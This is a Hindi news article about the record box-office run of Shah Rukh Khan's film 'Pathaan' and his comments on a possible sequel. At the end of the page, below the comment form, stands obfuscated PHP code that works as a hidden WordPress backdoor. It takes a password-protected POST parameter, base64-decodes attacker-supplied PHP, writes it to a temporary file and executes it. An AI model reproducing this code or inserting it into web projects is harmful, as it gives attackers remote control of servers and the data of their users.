‘पठान’ के बाद पठान 2 में जलवा दिखाएंगे शाह रुख खान , ‘पठान 2’ को लेकर कही यह बात की फैंस खुशी से झूम उठें

Uttarakhand Press News, 31 January 2023: शाह रुख खान की कमबैक फिल्म पठान ने बॉक्स ऑफिस पर गदर मचा दिया है। इस फिल्म ने कामयाबी की वो इबारत लिखी है, जिसकी कल्पना शायद ही किसी ने की हो। पठान फिल्म से शाह रुख खान ने चार साल बाद बड़े पर्दे पर वापसी की है और आते ही इस मूवी ने दमदार कलेक्शन का रिकॉर्ड बान दिया है।

‘पठान’ से चार साल पहले रिलीज हुईं शाह रुख की फिल्में कुछ खास कमाल नहीं कर रही थीं। फिर ‘पठान’ को रिलीज से पहले काफी विरोध का सामना करना पड़ा। फिल्म का कुल सात राज्यों में विरोध किया गया। इन सबके बावजूद जब 25 जनवरी को फिल्म रिलीज हुई, तो किसी ने सोचा भी नहीं होगा कि शाह रुख का धमाका इतना जोर का होगा कि यह फिल्म छह दिनों में ही 600 करोड़ से ज्यादा कमा ले जाएगी। इस बीच ‘पठान 2’ को लेकर भी खबर सामने आई है।

शाह रुख खान ने ‘पठान 2’ को लेकर कही यह बात:
सोमवार को शाह रुख खान, दीपिका पादुकोण, जॉन अब्राहम ने निर्देशक सिद्धार्थ आनंद के साथ प्रेस कॉन्फ्रेंस की। इस कॉन्फ्रेंस में किंग खान और पूरी टीम ने मीडिया के साथ ‘पठान’ की सफलता का जश्न मनाया और बेबाकी से कई सवालों के जवाब दिए। इस बीच शाह रुख से ‘पठान 2’ के बारे में पूछा गया, जिसका उन्होंने कुछ ऐसा जवाब दिया, जिसे जानने के बाद फैंस खुशी से झूम उठेंगे। दरअसल, कॉन्फ्रेंस के दौरान सिद्धार्थ आनंद ने ‘पठान 2’ को लेकर हिंट दिया। उन्होंने कहा, ‘पठान हिट हुई है। उसके बाद क्या बनाएंगे?’ वहां मौजूद लोगों ने जवाब में पठान 2 का नाम लिया, तो सिद्धार्थ आनंद ने भी कह दिया ‘इंशाअल्लाह।’ इसके बाद शाह रुख ने कहा कि इतने वर्षों में इतनी बड़ी खुशी (फिल्म के लिहाज से) नहीं मिली। जब भी सिद्धार्थ चाहेंगे कि मैं पठान 2 में काम करूं, मैं करुंगा। शाह रुख ने कहा कि पठान 2 में काम करना उनके लिए गर्व की बात होगी।

दुनियाभर में छाई ‘पठान’:
‘पठान’ की बादशाहत पूरी दुनिया में कायम है। फिल्म ने छह दिनों के अंदर 600 करोड़ से ज्यादा का कलेक्शन कर लिया है। अगर नेट कलेक्शन की भी बात करें, तो छह दिनों में 300 करोड़ का आंकड़ा पार कर लिया है। कुल मिलाकर शाह रुख खान की यह फिल्म हिट साबित हुई है।

Read Previous

Sidharth Kiara Wedding: सिद्धार्थ मल्होत्रा ने शेयर किया पोस्ट, बोले- नई शुरुआतों के लिए…

Read Next

Bageshwar Dham: धीरेंद्र शास्त्री का बयान- जल्द करूंगा विवाह, मगर ज्यादा लोगों को नहीं बुला पाऊंगा

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}